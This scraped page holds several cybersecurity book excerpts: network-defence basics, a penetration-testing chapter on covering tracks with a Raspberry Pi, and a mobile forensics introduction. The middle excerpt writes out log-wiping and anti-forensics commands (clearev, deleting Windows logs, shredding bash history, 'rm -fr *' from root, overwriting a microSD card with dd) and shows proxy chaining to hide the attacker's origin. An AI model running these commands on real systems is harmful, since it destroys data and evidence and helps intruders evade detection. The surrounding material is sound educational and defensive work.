compromised. By creating a backdoor, a hacker can maintain a persistent attack on a network, without fear of losing access to the devices they have gained control over. Although when a backdoor is created, it increases the chance of a hacker being discovered. Backdoors are noisy and often leave a large footprint for IDS to follow. Covering your tracks: This phase is about hiding the intrusion of the network by the hacker as to not alert any IDS that may be monitoring the network. The objective of this phase is to erase any trace that an attack occurred on the network. Recent events and statistics of network attacks The news has been full of cyber-attacks in recent years. The number and scale of attacks are increasing at an alarming rate. It is important for anyone in network security to study these attacks. Staying current with this kind of information will help in defending your network from similar attacks. Since 2015, the medical and insurance industry have been heavily targeted for cyber-attacks. On May 5th, 2015 Premera Blue Cross was attacked. This attack is said to have compromised at least 11 million customer accounts containing personal data. The attack exposed customer's names, birth dates, social security numbers, phone numbers, bank account information, mailing, and e-mail addresses. 
Another attack on a larger scale was the attack on Anthem. It is estimated that 80 million personal data records were stolen from customers, employees, and even the Chief Executive Officer of Anthem. Another, more infamous, recent cyber-attack was the Sony hack. This hack was a little different from the Anthem and Blue Cross attacks, because it was carried out by hacktivists instead of cyber-criminals. Even though both types of hacking are criminal, the fundamental reasoning and objectives of the attacks are quite different. The objective in the Sony attack was to disrupt and embarrass the executives at Sony, as well as prevent a film from being released. No financial data was targeted. Instead, the hackers went after the personal e-mails of top executives. The hackers then released the e-mails to the public, causing humiliation to Sony and its executives. Many apologies were issued by Sony in the weeks following the attack. Large commercial retailers have also been a favorite target for hackers. An attack occurred against Home Depot in September 2014. That attack was on a large scale. It is estimated that over 56 million credit cards were compromised during the Home Depot attack. A similar attack, but on a smaller scale, was carried out against Staples in October 2014. During this attack, over 1.4 million credit card numbers were stolen. The statistics on cyber security attacks are eye opening. It is estimated by some experts that cybercrime has a worldwide cost of 110 billion dollars a year. In a given year, over 15 million Americans will have their identity stolen through cyber-attacks, and it is also estimated that 1.5 million people fall victim to cybercrime every day. These statistics are rapidly increasing and will continue to do so until more people take an active interest in network security. Our defense The baseline for preventing potential security issues typically begins with hardening the security infrastructure, including firewalls, the DMZ, and the physical security platform, and with entrusting only valid sources or individuals with personal data and/or access to that data. That also includes being compliant with all regulations that apply to a given situation or business, being aware of the types of breaches as well as your potential vulnerabilities, and understanding whether an individual or an organization is a higher-risk target for attacks. The question has to be asked: does one's organization promote security, both at the personal and the business level, to deter cyber-attacks? After a decade of responding to incidents and helping customers recover from breaches and increase their resilience against them, an organization may already have a security training and awareness (STA) program, or other training programs may already exist. As the security and threat landscape evolves, organizations and individuals need to continually evaluate the practices that are required and appropriate for the data they collect, transmit, retain, and destroy. Encryption of data at rest/in storage and in transit is a fundamental security requirement, and the failure to apply it is frequently cited as the cause of regulatory action and lawsuits. Enforce effective password management policies. Least privilege user access (LUA) is a core security strategy component, and all accounts should run with as few privileges and access levels as possible. Conduct regular security design and code reviews, including penetration tests and vulnerability scans, to identify and mitigate vulnerabilities.
Require e-mail authentication on all inbound and outbound mail servers to help detect malicious e-mail, including spear phishing and spoofed e-mail. Continuously monitor, in real time, the security of your organization's infrastructure, including collecting and analyzing all network traffic, analyzing centralized logs (including firewall, IDS/IPS, VPN, and AV) using log management tools, and reviewing network statistics. Identify anomalous activity, investigate, and revise your view of anomalous activity accordingly. User training would be the biggest challenge, but it is arguably the most important defense. Security for individual versus company One of the fundamental questions individuals need to ask themselves is: is there a difference between the individual and an organization? Individuals are less likely to be attacked due to their smaller attack surface area. However, there are tools and sites on the internet that can be utilized to detect and mitigate data breaches for both. https://haveibeenpwned.com/ or http://map.norsecorp.com/ are good sites to start with. The issue is that individuals believe they are not a target because there is little to gain from attacking individuals, but in truth everyone has the ability to become a target. Wi-Fi vulnerabilities Protecting wireless networks can be very challenging at times. There are many vulnerabilities that a hacker can exploit to compromise a wireless network. One of the basic Wi-Fi vulnerabilities is broadcasting the Service Set Identifier (SSID) of your wireless network. Broadcasting the SSID makes the wireless network easier to find and target. Another vulnerability in Wi-Fi networks is using Media Access Control (MAC) addresses for network authentication. A hacker can easily spoof or mimic a trusted MAC address to gain access to the network. Using weak encryption such as Wired Equivalent Privacy (WEP) will make your network an easy target for attack. There are many hacking tools available to crack any WEP key in under five minutes. A major physical vulnerability in wireless networks is the access points (APs). Sometimes APs will be placed in poor locations that can be easily accessed by a hacker. A hacker may install what is called a rogue AP. This rogue AP will monitor the network for data that a hacker can use to escalate their attack. Often this tactic is used to harvest the credentials of high-ranking management personnel, to gain access to encrypted databases that contain the personal/financial data of employees, customers, or both. Peer-to-peer technology can also be a vulnerability for wireless networks. A hacker may gain access to a wireless network by using a legitimate user as an accepted entry point. Not using and enforcing security policies is also a major vulnerability found in wireless networks. Using security tools like Active Directory (deployed properly) will make it harder for a hacker to gain access to a network. Hackers will often go after low hanging fruit (easy targets), so having at least some deterrence will go a long way in protecting your wireless network. Using Intrusion Detection Systems (IDS) in combination with Active Directory will immensely increase the defense of any wireless network. Although the most effective factor is having a well-trained and informed cyber security professional watching over the network. The more a cyber security professional (threat hunter) understands the tactics of a hacker, the more effective that threat hunter will become in discovering and neutralizing a network attack.
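To make two of the weaknesses above more concrete, here is a minimal sketch of an access point configuration that avoids WEP and does not broadcast the SSID. The article does not name any particular AP software; hostapd is used here purely as an illustration, the SSID and passphrase are placeholders, and a commercial AP would expose equivalent settings in its own management interface:

# /etc/hostapd/hostapd.conf -- illustrative fragment only
interface=wlan0
ssid=corp-internal            # hypothetical network name
ignore_broadcast_ssid=1       # do not broadcast the SSID
wpa=2                         # WPA2 instead of WEP
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=ChangeThisLongPassphrase

Hiding the SSID and requiring WPA2 does not make a network unbreakable, but it removes the low hanging fruit described above.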
Although there are many challenges in protecting a wireless network, with the proper planning and deployment those challenges can be overcome. Knowns and unknowns The toughest thing about unknown security risks is that they are unknown. Unless they are found, they can stay hidden. A common practice to determine an unknown risk would be to identify all the known risks and attempt to mitigate them as best as possible. There are many sites available that can assist in this venture. The most helpful would be reports from CVE sites that identify vulnerabilities. False positives

             Positive                        Negative
True         TP: correctly identified        TN: correctly rejected
False        FP: incorrectly identified      FN: incorrectly rejected

As it relates to detection, there are four situations that exist for an analyzed event, corresponding to the relation between the result of the detection and the true nature of the event. Each of the situations mentioned in the preceding table is outlined as follows: True positive (TP): It is when the analyzed event is correctly classified as intrusion or as harmful/malicious. For example, a network security administrator enters their credentials into the Active Directory server and is granted administrator access. True negative (TN): It is when the analyzed event is correctly classified and correctly rejected. For example, an attacker uses a port like 4444 to communicate with a victim's device. An intrusion detection system detects network traffic on the unauthorized port and alerts the cyber security team to this potential malicious activity. The cyber security team quickly closes the port and isolates the infected device from the network. False positive (FP): It is when the analyzed event is innocuous or otherwise clean from a security perspective; however, the system classifies it as malicious or harmful. For example, a user types their password into a website's login text field. Instead of being granted access, the user is flagged for an SQL injection attempt by input sanitization. This is often caused when input sanitization is misconfigured. False negative (FN): It is when the analyzed event is malicious but it is classified as normal/innocuous. For example, an attacker inputs an SQL injection string into a text field found on a website to gain unauthorized access to database information. The website accepts the SQL injection as normal user behavior and grants access to the attacker. As it relates to detection, having systems correctly identify the given situations is paramount. Mitigation against threats There are many threats that a network faces. New network threats are emerging all the time. As a network security professional, it would be wise to have a good understanding of effective mitigation techniques. For example, a hacker using a packet sniffer can be mitigated by only allowing the network admin to run a network analyzer (packet sniffer) on the network. A packet sniffer can usually detect another packet sniffer on the network right away, although there are ways a knowledgeable hacker can disguise the packet sniffer as another piece of software. A hacker will not usually go to such lengths unless it is a highly-secured target. It is alarming that most businesses do not properly monitor their networks, or do not monitor them at all. It is important for any business to have a business continuity/disaster recovery plan. This plan is intended to allow a business to continue to operate and recover from a serious network attack.
The most common deployment of the continuity/disaster recovery plan is after a DDoS attack. A DDoS attack could potentially cost a business or organization millions of dollars is lost revenue and productivity. One of the most effective and hardest to mitigate attacks is social engineering. All the most devastating network attacks have begun with some type of social engineering attack. One good example is the hack against Snapchat on February 26th, 2016. "Last Friday, Snapchat's payroll department was targeted by an isolated e-mail phishing scam in which a scammer impersonated our Chief Executive Officer and asked for employee payroll information," Snapchat explained in a blog post. Unfortunately, the phishing e-mail wasn't recognized for what it was — a scam — and payroll information about some current and former employees was disclosed externally. Socially engineered phishing e-mails, same as the one that affected Snapchat are common attack vectors for hackers. The one difference between phishing e-mails from a few years ago, and the ones in 2016 is, the level of social engineering hackers are putting into the e-mails. The Snapchat HR phishing e-mail, indicated a high level of reconnaissance on the Chief Executive Officer of Snapchat. This reconnaissance most likely took months. This level of detail and targeting of an individual (Chief Executive Officer) is more accurately know as a spear-phishing e-mail. Spear-phishing campaigns go after one individual (fish) compared to phishing campaigns that are more general and may be sent to millions of users (fish). It is like casting a big open net into the water and seeing what comes back. The only real way to mitigate against social engineering attacks is training and building awareness among users. By properly training the users that access the network, it will create a higher level of awareness against socially engineered attacks. Building an assessment Creating a network assessment is an important aspect of network security. A network assessment will allow for a better understanding of where vulnerabilities may be found within the network. It is important to know precisely what you are doing during a network assessment. If the assessment is done wrong, you could cause great harm to the network you are trying to protect. Before you start the network assessment, you should determine the objectives of the assessment itself. Are you trying to identify if the network has any open ports that shouldn't be? Is your objective to quantify how much traffic flows through the network at any given time or a specific time? Once you decide on the objectives of the network assessment, you will then be able to choose the type of tools you will use. Network assessment tools are often known as penetration testing tools. A person who employs these tools is known as a penetration tester or pen tester. These tools are designed to find and exploit network vulnerabilities, so that they can be fixed before a real attack occurs. That is why it is important to know what you are doing when using penetration testing tools during an assessment. Sometimes network assessments require a team. It is important to have an accurate idea of the scale of the network before you pick your team. In a large enterprise network, it can be easy to become overwhelmed by tasks to complete without enough support. Once the scale of the network assessment is complete, the next step would be to ensure you have written permission and scope from management. 
All parties involved in the network assessment must be clear on what can and cannot be done to the network during the assessment. After the assessment is completed, the last step is creating a report to educate concerned parties of the findings. Providing detailed information and solutions to vulnerabilities will help keep the network up to date on defense. The report will also be able to determine if there are any viruses lying dormant, waiting for the opportune time to attack the network. Network assessments should be conducted routinely and frequently to help ensure strong networksecurity. Summary In this article we covered the fundamentals of network security. It began by explaining the importance of having network security and what should be done to secure the network. It also covered the different ways physical security can be applied. The importance of having security policies in place and wireless security was discussed. This article also spoke about wireless security policies and why they are important. Resources for Article: Further resources on this subject: API and Intent-Driven Networking [article] Deploying First Server [article] Point-to-Point Networks [article]

article-image-finishing-attack-report-and-withdraw
Packt
21 Dec 2016
11 min read
Save for later

Finishing the Attack: Report and Withdraw

Packt
21 Dec 2016
11 min read
In this article by Michael McPhee and Jason Beltrame, the authors of the book Penetration Testing with Raspberry Pi - Second Edition, we will look at the final stage of the Penetration Testing Kill Chain, which is Reporting and Withdrawing. Some may argue the validity and importance of this step, since much of the hard-hitting effort and impact has already been delivered by this point. But without properly cleaning up and covering our tracks, we can leave behind little breadcrumbs which can notify others of where we have been and also what we have done. This article covers the following topics: Covering our tracks Masking our network footprint (For more resources related to this topic, see here.) Covering our tracks One of the key tasks in which penetration testers as well as criminals tend to fail is cleaning up after they breach a system. Forensic evidence can be anything from the digital network footprint (the IP address, type of network traffic seen on the wire, and so on) to the logs on a compromised endpoint. There is also evidence left by the tools used, such as when using a Raspberry Pi to do something malicious. An example is running more ~/.bash_history on a Raspberry Pi to see the entire history of the commands that were used. The good news for Raspberry Pi hackers is that they don't have to worry about storage elements such as ROM, since the only storage to consider is the microSD card. This means attackers just need to re-flash the microSD card to erase evidence that the Raspberry Pi was used. Before doing that, let's work our way through the clean up process, starting from the compromised system and ending with the last step of reimaging our Raspberry Pi. Wiping logs The first step we should perform to cover our tracks is to clean any event logs from the compromised system that we accessed. For Windows systems, we can use a tool within Metasploit called Clearev that does this for us in an automated fashion. Clearev is designed to access a Windows system and wipe the logs. An overzealous administrator might notice the changes when we clean the logs. However, most administrators will never notice the changes. Also, since the logs are wiped, the worst that could happen is that an administrator might identify that their systems have been breached, but the logs containing our access information would have been removed. Clearev comes with the Metasploit arsenal. To use clearev once we have breached a Windows system with a Meterpreter, type meterpreter > clearev. There is no further configuration, which means clearev just wipes the logs upon execution. The following screenshot shows what that will look like: Here is an example of the logs before they are wiped on a Windows system: Another way to wipe off logs from a compromised Windows system is by installing a Windows log cleaning program. There are many options available to download, such as ClearLogs found at http://ntsecurity.nu/toolbox/clearlogs/. Programs such as these are simple to use; we can just install and run one on a target once we are finished with our penetration test. We can also just delete the logs manually from a command prompt using the del %WINDIR%\*.log /a/s/q/f command. This command selects all log files regardless of attributes with /a, includes subfolders with /s, suppresses any confirmation prompts with /q, and forces the deletion with /f. Whichever program you use, make sure to delete the executable file once the log files are removed so that the file isn't identified during a future forensic investigation. A consolidated sketch of this manual cleanup is shown below.
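Putting the manual Windows steps together, a minimal sketch might look like the following. The wevtutil commands are an addition not mentioned above: wevtutil is the built-in Windows utility for managing event logs, and clearing the Application, System, and Security logs this way also covers event logs that are not stored as loose .log files. The path to the cleanup tool is purely a placeholder:

:: wipe loose log files on disk
del %WINDIR%\*.log /a /s /q /f
:: clear the main Windows event logs (built-in wevtutil utility, not covered in the text)
wevtutil cl Application
wevtutil cl System
wevtutil cl Security
:: finally, remove the cleanup tool itself so it is not found later (hypothetical path)
del C:\temp\clearlogs.exe /f /q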
For Linux systems, we need to get access to the /var/log folder to find the log files. Once we have access to the log files, we can simply open them and remove all entries. The following screenshot shows an example of our Raspberry Pi's log folder: We can just delete the files using the remove command, rm, such as rm FILE.txt, or delete the entire folder; however, this wouldn't be as stealthy as wiping existing files clean of your footprint. Another option is in Bash. We can simply type > /path/to/file to empty the contents of a file, without necessarily removing it. This approach has some stealth benefits. Kali Linux does not have a GUI-based text editor, so one easy-to-use tool that we can install is gedit. We'll use apt-get install gedit to download it. Once installed, we can find gedit under the application dropdown or just type gedit in the terminal window. As we can see from the following screenshot, it looks like many common text file editors. Let's click on File and select files from the /var/log folder to modify them. We also need to erase the command history, since the Bash shell saves the last 500 commands. This forensic evidence can be accessed by typing the more ~/.bash_history command. The following screenshot shows the first of the hundreds of commands we recently ran on my Raspberry Pi: To verify the number of stored commands in the history file, we can type the echo $HISTSIZE command. To erase this history, let's type export HISTSIZE=0. From this point, the shell will not store any command history, that is, if we press the up arrow key, it will not show the last command. These commands can also be placed in a .bashrc file on Linux hosts. The following screenshot shows that we have verified whether our last 500 commands are stored. It also shows what happens after we erase them: It is a best practice to set this command prior to using any commands on a compromised system, so that nothing is stored upfront. You could also log out and log back in once the export HISTSIZE=0 command is set to clear your history. You should also do this on your C&C server once you conclude your penetration test if you have any concerns of being investigated. A more aggressive and quicker way to remove our history file on a Linux system is to shred it with the shred -zu /root/.bash_history command. This command overwrites the history file (finishing with zeros) and then deletes it. We can verify this using the less /root/.bash_history command to see if there is anything left in your history file, as shown in the following screenshot:
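Taken together, a minimal sketch of the history cleanup on the compromised host (or on our own Raspberry Pi) might look like this; the history -c builtin is an addition not mentioned above and simply clears the history the current shell already holds in memory:

# stop the current shell from recording further commands
export HISTSIZE=0
# clear what the current shell already holds in memory (not covered in the text)
history -c
# overwrite the history file on disk, finishing with zeros, then delete it
shred -zu /root/.bash_history
# confirm nothing is left behind
less /root/.bash_history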
Masking our network footprint Anonymity is a key ingredient when performing our attacks, unless we don't mind someone being able to trace us back to our location and giving up our position. Because of this, we need a way to hide or mask where we are coming from. This is a perfect use case for a proxy, or groups of proxies if we really want to make sure we don't leave a trail of breadcrumbs. When using a proxy, the source of an attack will look as though it is coming from the proxy instead of the real source. Layering multiple proxies can help provide an onion effect, in which each layer hides the other, and makes it very difficult to determine the real source during any forensic investigation. Proxies come in various types and flavors. There are websites devoted to hiding our source online, and with a quick Google search, we can see some of the most popular, like hide.me, Hidestar, NewIPNow, ProxySite and even AnonyMouse. Following is a screenshot from the NewIPNow website. Administrators of proxies can see all traffic as well as identify both the target and the victims that communicate through their proxy. It is highly recommended that you research any proxy prior to using it, as some might use information captured without your permission. This includes providing forensic evidence to authorities or selling your sensitive information. Using ProxyChains Now, if web-based proxies are not what we are looking for, we can route our traffic from the Raspberry Pi through one or more proxies utilizing the ProxyChains application. ProxyChains is a very easy application to set up and start using. First, we need to install the application. This can be accomplished by running the following command from the CLI: root@kali:~# apt-get install proxychains Once installed, we just need to edit the ProxyChains configuration located at /etc/proxychains.conf, and put in the proxy servers we would like to use: There are lots of options out there for finding public proxies. We should certainly use them with some caution, as some proxies will use our data without our permission, so we'll be sure to do our research prior to using one. Once we have one picked out and have updated our proxychains.conf file, we can test it out. To use ProxyChains, we just need to follow the following syntax: proxychains <command you want tunneled and proxied> <opt args> Based on that syntax, to run an nmap scan, we would use the following command: root@kali:~# proxychains nmap 192.168.245.0/24 ProxyChains-3.1 (http://proxychains.sf.net) Starting Nmap 7.25BETA1 ( https://nmap.org ) Clearing the data off the Raspberry Pi Now that we have covered our tracks on the network side, as well as on the endpoint, all we have left is any of the equipment that we have left behind. This includes our Raspberry Pi. To reset our Raspberry Pi back to factory defaults, we can refer back to installing Kali Linux and re-install either Kali or the NOOBS software. This will allow us to have a clean image running once again. If we had cloned our golden image, we could just re-image our Raspberry Pi with that image. If we don't have the option to re-image or reinstall our Raspberry Pi, we do have the option to just destroy the hardware. The most important piece to destroy would be the microSD card (see the following image), as it contains everything that we have done on the Pi. But we may want to consider destroying any of the interfaces that we may have used (USB Wi-Fi, Ethernet, or Bluetooth adapters), as any of those physical MAC addresses may have been recorded on the target network, and therefore could prove that the device was there. If we had used our onboard interfaces, we may even need to destroy the Raspberry Pi itself. If the Raspberry Pi is in a location that we cannot get to in order to reclaim it or destroy it, our only option is to remotely corrupt it so that we can remove any clues of our attack on the target. To do this, we can use the rm command within Kali. The rm command is used to remove files and such from the operating system. As a cool bonus, rm has some interesting flags that we can use to our advantage. These flags include the -r and the -f flags. The -r flag indicates to perform the operation recursively, so everything in that directory and below will be removed, while the -f flag forces the deletion without asking. So running the command rm -fr * from any directory will remove all contents within that directory and anything below it. Where this command gets interesting is if we run it from /, a.k.a. the top of the directory structure. Since the command will remove everything in that directory and below, running it from the top level will remove all files and hence render that box unusable.
Since the command will remove everything in that directory and preceding, running it from the top level will remove all files and hence render that box unusable. As any data forensics person will tell us, that data is still there, just not being used by the operation system. So, we really need to overwrite that data. We can do this by using the dd command. We used dd back when we were setting up the Raspberry Pi. We could simply use the following to get the job done: dd if=/dev/urandom of=/dev/sda1 (where sda1 is your microSD card) In this command we are basically writing random characters to the microSD card. Alternatively, we could always just reformat the whole microSD card using the mkfs.ext4 command: mkfs.ext4 /dev/sda1 ( where sda1 is your microSD card ) That is all helpful, but what happens if we don't want to destroy the device until we absolutely need to – as if we want the ability to send over a remote destroy signal? Kali Linux now includes a LUKS Nuke patch with its install. LUKS allows for a unified key to get into the container, and when combined with Logical Volume Manager (LVM), can created an encrypted container that needs a password in order to start the boot process. With the Nuke option, if we specify the Nuke password on boot up instead of the normal passphrase, all the keys on the system are deleted and therefore rendering the data inaccessible. Here are some great links to how and do this, as well as some more details on how it works: https://www.kali.org/tutorials/nuke-kali-linux-luks/ http://www.zdnet.com/article/developers-mull-adding-data-nuke-to-kali-linux/ Summary In this article we sawreports themselves are what our customer sees as our product. It should come as no surprise that we should then take great care to ensure they are well organized, informative, accurate and most importantly, meet the customer's objectives. Resources for Article: Further resources on this subject: Penetration Testing [article] Wireless and Mobile Hacks [article] Building Your Application [article]
article-image-digital-and-mobile-forensics
Packt
14 Nov 2016
14 min read
Save for later

Digital and Mobile Forensics

Packt
14 Nov 2016
14 min read
In this article, Mattia Epifani and Pasquale Stirparo, co-authors of the book Learning iOS Forensics - Second Edition, would be talking mainly, if not solely, about computer forensics and computer crimes, such as when an attacker breaks into a computer network system and steals data. This would involve two types of offenses—unlawful/unauthorized access and data theft. As mobile phones became more popular, the new field of mobile forensics developed. (For more resources related to this topic, see here.) Nowadays, things have changed radically and they are still changing at quite a fast pace as technology evolves. Digital forensics, which includes all disciplines dealing with electronic evidence, is also being applied to common crimes, to those that, at least by definition, are not strictly IT crimes. Today, more than ever, we live in a society that is fully digitalized and people are equipped with all kinds of devices, which have different types of capabilities, but all of them process, store, and transmit information (mainly over the Internet). This means that forensic investigators have to be able to deal with all these devices. As defined at the first Digital Forensics Research Workshop (DFRWS) in 2001, digital forensics is: "The use of scientifically derived and proven methods toward the preservation, collection, validation, identification, analysis, interpretation, documentation, and presentation of digital evidence derived from digital sources for the purpose of facilitating or furthering the reconstruction of events found to be criminal, or helping to anticipate unauthorized actions shown to be disruptive to planned operations." As Casey asserted (Casey, 2011): "In this modern age, it is hard to imagine a crime that does not have a digital dimension." Criminals of all kinds use technology to facilitate their offenses, communicate with their peers, recruit other criminals, launder money, commit credit card fraud, gather information on their victims, and so on. This obviously creates new challenges for all the different actors involved, such as attorneys, judges, law enforcement agents, and forensic examiners. Among the cases solved in recent years, there were kidnappings where the kidnapper was caught—thanks to a request for ransom sent by e-mail from his mobile phone. There have been many cases of industrial espionage in which unfaithful employees were hiding projects in the memory cards of their smartphones, cases of drug dealing solved—thanks to the evidence found in the backup of mobile phones that was on computer, and many other such cases. Even the largest robberies of our time are now being conducted via computer networks. In this article, you will learn the following: Definition and principles of mobile forensics How to properly handle digital evidence Mobile forensics Mobile forensics is a field of study in digital forensics that focuses on mobile devices. Among the different digital forensics fields, mobile forensics is without doubt the fastest growing and evolving area of study, having an impact on many different situations from corporate to criminal investigations and intelligence gathering, which are on the rise. Moreover, the importance of mobile forensics is increasing exponentially due to the continuous fast growth of the mobile market. 
One of the most interesting peculiarities of mobile forensics is that mobile devices, particularly mobile phones, usually belong to a single individual, while this is not always the case with a computer that may be shared among employees of a company or members of a family. For this reason, the analysis of mobile phones gives access to plenty of personal information. Another important and interesting aspect that comes with mobile forensics, which is both challenging and frustrating at the same time for the analyst, is the multitude of different device models and the customized flavors of their operating systems available in the market. This makes it very difficult to have a single solution (either a tool or process) to address them all. Just think of all the applications people have installed on their smartphones: IM clients, web browsers, social network clients, password managers, navigation systems, and much more, other than the classic default ones, such as an address book, which can provide a lot more information than just the phone number for each contact that has been saved. Moreover, syncing such devices with a computer has become a very easy and smooth process, and all user activities, schedules, to-do lists, and everything else is stored inside a smartphone. Aren't these enough to profile a person and reconstruct all their recent activities, not to mention building their network of contacts? Finally, in addition to a variety of smartphones and operating systems, such as Apple iOS, Google Android, Microsoft Windows Phone, and Blackberry OS, there is a massive number of so-called feature phones that use older mobile OS systems. Therefore, it's pretty clear that when talking about mobile/smartphone forensics, there is so much more than just printouts of phone calls. In fact, with a complete examination, we can retrieve SMSes/MMSes, pictures, videos, installed applications, e-mails, geolocation data, and so on—both present and deleted information. Digital evidence As mentioned earlier, on one hand the increasing involvement of mobile devices in digital forensics cases has brought a whole new series of challenges and complexities. However, on the other hand, this has also resulted in a much greater amount of evidence from criminals that can now be used to reconstruct their activities with a more comprehensive level of detail. Moreover, while classical physical evidence may be destroyed, digital evidence, most of the time, leaves traces. Over the years, there have been several definitions of what digital evidence actually is, some of them focusing particularly on the evidentiary aspects of proof to be used in court, such as the one proposed by the Scientific Working Group on Digital Evidence (SWGDE), stating that: "Digital evidence is any information of probative value that is either stored or transmitted in a digital form." The definition proposed by the International Organization of Computer Evidence (IOCE) states: "Digital evidence is information stored or transmitted in binary form that may be relied on in court." The definition given by E. Casey (Casey, 2000), refers to digital evidence as: "Physical objects that can establish that a crime has been committed, can provide a link between a crime and its victim, or can provide a link between a crime and its perpetrator."
For this reason, and for the purpose of this book, we will refer to the definition given by Carrier (Carrier, 2006), where digital evidence is defined as: "Digital data that supports or refutes a hypothesis about digital events or the state of digital data." This definition is a more general one, but better matches the current state of digital evidence and its value within the entire investigation process. Also from a standardization point of view, there have been, and still are, many attempts to define guidelines and best practices for digital forensics on how to handle digital evidence. Other than the several guidelines and special publications from NIST, there is a standard from ISO/IEC that was released in 2012, the ISO 27037 guidelines for identification, collection and/or acquisition, and preservation of digital evidence, which is not specific to mobile forensics, but is related to digital forensics in general, aiming to build a standard procedure for collecting and handling digital evidence, which will be legally recognized and accepted in court in different countries. This is a really important goal if you consider the lack of borders in the Internet era, particularly when it comes to digital crimes, where illicit actions can be perpetrated by attackers from anywhere in the world. Handling of mobile evidence In order to be useful not only in court but also during the entire investigation phase, digital evidence must be collected, preserved, and analyzed in a forensically sound manner. This means that each step, from the identification to the reporting, has to be carefully and strictly followed. Historically, we are used to referring to a methodology as forensically sound if, and only if, it would imply that the original source of evidence remains unmodified and unaltered. This was mostly true when talking about classical computer forensics, in scenarios where the forensic practitioner found the computer switched off or had to deal with external hard drives, although not completely true even in these situations. However, since the rise of live forensics, this concept has become more and more untrue. In fact, methods and tools for acquiring memory from live systems inevitably alter, even if just a little bit, the target system they are run on. The advent of mobile forensics stresses this concept even more, because mobile devices, and smartphones in particular, are networked devices that continuously exchange data through several communication protocols, such as GSM/CDMA, Wi-Fi, Bluetooth, and so on. Moreover, in order to acquire a mobile device, forensic practitioners need to have some degree of interaction with the device. Based on the type, a smartphone can need more or less interaction, altering in this way the original state of the device. All of this does not mean that preservation of the source evidence is useless, but that it is nearly impossible in the field of mobile devices. Therefore, it becomes a matter of extreme importance to thoroughly document every step taken during the collection, preservation, and acquisition phases. Using this approach, forensic practitioners will be able to demonstrate that they have been as unintrusive as possible. As Casey states (Casey, 2011): "One of the keys to forensic soundness is documentation. A solid case is built on supporting documentation that reports on where the evidence originated and how it was handled. 
From a forensic standpoint, the acquisition process should change the original evidence as little as possible and any changes should be documented and assessed in the context of the final analytical results." When in the presence of mobile devices to be collected, it is a good practice for the forensic practitioner to consider the following points: Take note of the current location where the device has been found. Report the device status (switched on or off, broken screen, and so on). Report date, time, and other information visible on the screen if the device is switched on, for example, by taking a picture of the screen. Look very carefully for the presence of memory cards. Although it is not the case with iOS devices, generally many mobile phones have a slot for an external memory card, where pictures, chat databases, and many other types of user data are usually stored. Look very carefully for the presence of cables related to the mobile phone that is being collected, especially if you don't have a full set of cables in your lab. Many mobile phones have their own cables to connect to the computer and to recharge the battery. Search for the original Subscriber Identity Module (SIM) package, because that is where the PIN and PIN unblocking key (PUK) codes are written. Take pictures of every item before collection. Modifications to mobile devices can happen not only because of interaction with the forensic practitioner, but also due to interaction with the network, voluntarily or not. In fact, digital evidence in mobile devices can be lost completely as they are susceptible to being overwritten by new data, for example, with the smartphone receiving an SMS while it is being collected, thus overwriting possible evidence previously stored in the same area of memory as the newly arrived SMS, or upon receiving a remote wiping command over a wireless network. Most of today's smartphones and iOS devices can be configured to be completely wiped remotely. From a real case: While searching inside the house of a person under investigation, law enforcement agents found and seized, among other things, computers and a smartphone. After cataloguing and documenting everything, they put all the material into boxes to bring them back to the laboratory. Once back in their laboratory, when acquiring the smart phone in order to proceed with the forensics analysis, they noticed that the smartphone was empty and it appeared to be brand new. The owner had wiped it remotely. Therefore, isolating the mobile device from all radio networks is a fundamental step in the process of preservation of evidence. There are several ways to achieve this, all with their own pros and cons, as follows: Airplane mode: Enabling Airplane mode on a device requires some sort of interaction, which may pose some risks of modification by the forensic practitioner. This is one of the best possible options since it implies that all wireless communication chips are switched off. In this case, it is always good to document the action taken with pictures and/or videos. Normally, this is possible only if the phone is not password-protected or the password is known. However, for devices with iOS 7 or higher, it is also possible to enable airplane mode by lifting the dock from the bottom, where there will be a button with the shape of a plane. This is possible only if the Access on Lock Screen option is enabled from Settings | Control Center. 
Faraday's bag: This item is a sort of envelope made of conducting material, which blocks out static electric fields and electromagnetic radiation completely isolating the device from communicating with external networks. It is based, as the name suggests, on Faraday's law. This is the most common solution, particularly useful when the device is being carried from the crime scene to the lab after seizure. However, the use of Faraday's bag will make the phone continuously search for a network, which will cause the battery to quickly drain. Unfortunately, it is also risky to plug the phone to a power cable outside that will go inside the bag, because this may act as antenna. Moreover, it is important to keep in mind that when you remove the phone from the bag (once arrived in the lab) it will again be exposed to the network. So, you would need either a shielded lab environment or a Faraday solution that would allow you to access the phone while it is still inside the shielded container, without the need for external power cables. Jamming: A jammer is used to prevent a wireless device from communicating by sending out radio waves along the same frequencies as that device. In our case, it would jam the GSM/UMTS/LTE frequencies that mobile phones use to connect with cellular base stations to send/receive data. Be aware that this practice may be considered illegal in some countries, since it will also interfere with any other mobile device in the range of the jammer, disrupting their communications too. Switching off the device: This is a very risky practice because it may activate authentication mechanisms, such as PIN codes or passcodes, that are not available to the forensic practitioner, or other encryption mechanisms that carry the risk of delaying or even blocking the acquisition of the mobile device. Removing the SIM card: In most mobile devices, this operation implies removing the battery and therefore all the risks and consequences we just mentioned regarding switching off the device; however, in iOS devices this task is quite straightforward and easy, and it does not imply removing the battery (in iOS devices this is not possible). Moreover, SIM cards can have PIN protection enabled; removing it from the phone may lock the SIM card, preventing its content from being displayed. However, bear in mind that removing the SIM card will isolate the device only from the cellular network, while other networks, such as Wi-Fi or Bluetooth, may still be active and therefore need to be addressed. The following image shows a SIM card extracted from an iPhone with just a clip; image taken from http://www.maclife.com/: Summary In this article, we gave a general introduction to digital forensics for those relatively new to this area of study and a good recap to those already in the field, keeping the mobile forensics field specifically in mind. We have shown what digital evidence is and how it should be handled, presenting several techniques to isolate the mobile device from the network. Resources for Article: Further resources on this subject: Mobile Forensics [article] Mobile Forensics and Its Challanges [article] Forensics Recovery [article]

Information Gathering and Vulnerability Assessment

Packt
08 Nov 2016
7 min read
